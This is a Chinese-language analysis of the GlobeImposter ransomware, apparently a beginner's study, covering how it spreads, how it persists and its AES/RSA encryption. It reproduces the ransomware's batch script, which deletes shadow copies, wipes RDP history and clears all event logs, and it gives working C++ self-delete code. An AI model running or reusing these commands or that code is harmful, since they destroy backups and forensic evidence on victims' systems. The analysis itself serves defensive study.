GlobeImposter病毒分析

1、前言

GlobeImposter是一款2018~2019年比较活跃的勒索病毒，它的体积很小，没有网络通信行为。和wannacry一样没有对抗行为，属于比较老的勒索病毒了，适合新手入门分析。

1.1、介绍

Global勒索病毒于2017年5月首次出现，主要通过钓鱼邮件进行传播。2018年8月21日起，多地发生GlobeImposter勒索病毒事件，攻击目标主要是开启远程控制的服务器、攻击者暴力破解服务器密码，对内网服务器发起扫描并人工投放勒索病毒，导致文件被加密，暂时无法解密。GlobeImposter勒索病毒勒索信如下图所示：

1.2、病毒特性：

1. 常见后缀：auchentoshan、动物名+4444。
2. 传播方法：RDP暴力破解、钓鱼邮件、捆绑软件等等。
3. 特征：在%appdata%或%localappdata%文件夹下释放。

1.3、逻辑分析：

1. 解密RSA公钥、后缀名和勒索文件。
2. 持久化驻留，拷贝到%appdata%目录，添加自启动项。
3. 遍历磁盘，创建线程循环加密所有文件，并在所有文件夹内拷贝一份勒索信。
4. 释放脚本temp.bat，删除远程桌面连接信息文件，删除日志信息。
5. 启动自删除。

详细分析：

一、预处理进行五次解密分别释放需要的文件

1. 第一次解密：释放RSA公钥
2. 第二次解密：释放加密文件后缀名和勒索文件名
3. 第三次解密：释放加密文件后缀名和勒索文件名
4. 第四次解密：为了确保程序的正常运行，解密不能勒索加密的文件路径名
5. 第五次解密：释放加密文件后缀名和路径

二、持久化驻留

持久化驻留行为，将文件拷贝到appdata/local目录下，并创建Software\Microsoft\Windows\CurrentVersion\RunOnce注册表项。由于是勒索病毒，所以目的方面和木马不同。不是为了长时间驻留，窃取情报，而是防止病毒未启动，在新的一次开机时，进行启动。

三、遍历文件夹、加密文件

遍历磁盘和文件夹，创建线程使用AES进行加密。

四、勒索病毒加密过程

使用AES算法，对文件进行循环加密。如果该目录文件已经加密完成，写入勒索信。

使用RSA加密AES密钥，然后将密钥写入文件。然后对文件进行AES加密，将加密后的文件内容，写入该文件。

五、自删除行为

通过释放并运行文件temp.bat，删除远程桌面连接信息文件default.rdp，并通过wevtutil.exe命令，删除日志信息。

@echo?off
vssadmin.exe?Delete?Shadows?/All?/Quiet
reg?delete?"HKEY_CURRENT_USER\Software\Microsoft\Terminal?Server?Client\Default"?/va?/f
reg?delete?"HKEY_CURRENT_USER\Software\Microsoft\Terminal?Server?Client\Servers"?/f
reg?add?"HKEY_CURRENT_USER\Software\Microsoft\Terminal?Server?Client\Servers"
cd?%userprofile%\documents\
attrib?Default.rdp?-s?-h
del?Default.rdp?
for?/F?"tokens=*"?%1?in?('wevtutil.exe?el')?DO?wevtutil.exe?cl?"%1"

六、程序自杀

执行 COMSPEC /c del szPath > nul 自杀程序。

测试程序如下述代码所示：

#include?<windows.h>
#include?<Shlobj.h>
#include?<iostream>
using?namespace?std;

int?main()
{
????SHELLEXECUTEINFO?sei;
????TCHAR?szModule[MAX_PATH],?szComspec[MAX_PATH],?szParams[MAX_PATH];

????//获取文件路径名。
????if?((GetModuleFileName(0,?szModule,?MAX_PATH)?!=?0)?&&
????????(GetEnvironmentVariable("COMSPEC",?szComspec,?MAX_PATH)?!=?0))
????{
????????//设置命令行参数。
????????lstrcpy(szParams,?"/c?del?");
????????lstrcat(szParams,?szModule);
????????lstrcat(szParams,?"?>?nul");

????????//初始化SHELLEXECUTEINFO结构成员
????????sei.cbSize?=?sizeof(sei);??//设置类型大小。
????????sei.hwnd?=?0;?//命令窗口进程句柄，ShellExecuteEx函数执行时设置。
????????sei.lpVerb?=?"Open";??//执行动作为“打开执行”。
????????sei.lpFile?=?szComspec;?//执行程序文件全路径名称。
????????sei.lpParameters?=?szParams;?//执行参数。
????????sei.lpDirectory?=?0;
????????sei.nShow?=?SW_HIDE;?//显示方式，此处使用隐藏方式阻止出现命令窗口界面。
????????sei.fMask?=?SEE_MASK_NOCLOSEPROCESS;?//设置为SellExecuteEx函数结束后进程退出。

????????//创建执行命令窗口进程。
????????if?(ShellExecuteEx(&sei))
????????{
????????????//设置命令行进程的执行级别为空闲执行，这使本程序有足够的时间从内存中退出。
????????????SetPriorityClass(sei.hProcess,?IDLE_PRIORITY_CLASS);

????????????//设置本程序进程的执行级别为实时执行，这本程序马上获取CPU执行权，快速退出。?
????????????SetPriorityClass(GetCurrentProcess(),?REALTIME_PRIORITY_CLASS);
????????????SetThreadPriority(GetCurrentThread(),?THREAD_PRIORITY_TIME_CRITICAL);

????????????//通知Windows资源浏览器，本程序文件已经被删除。
????????????SHChangeNotify(SHCNE_DELETE,?SHCNF_PATH,?szModule,?0);

????????????//执行退出程序。
????????????exit(0);
????????}
????}
?return?0;
}

总结：

此勒索病毒样本逻辑清晰，易于分析。由于该程序加密程序无明显错误，所以想要解密需要硬刚RSA解密。RSA的公钥为4096位。位数超过了工程师能够破解的极限，想要获取私钥，需要密码学家的进一步支持。

MD5:

C120F323C78D046C991F0EFE45F3819C

Reference：

• [1] 《网络安全应急响应——技术实战指南》
• [2] ?https://blog.csdn.net/weixin_30566111/article/details/95912042
• [3] ?https://it.rising.com.cn/fanglesuo/19531.html
• [4] ?https://www.freebuf.com/articles/system/163792.html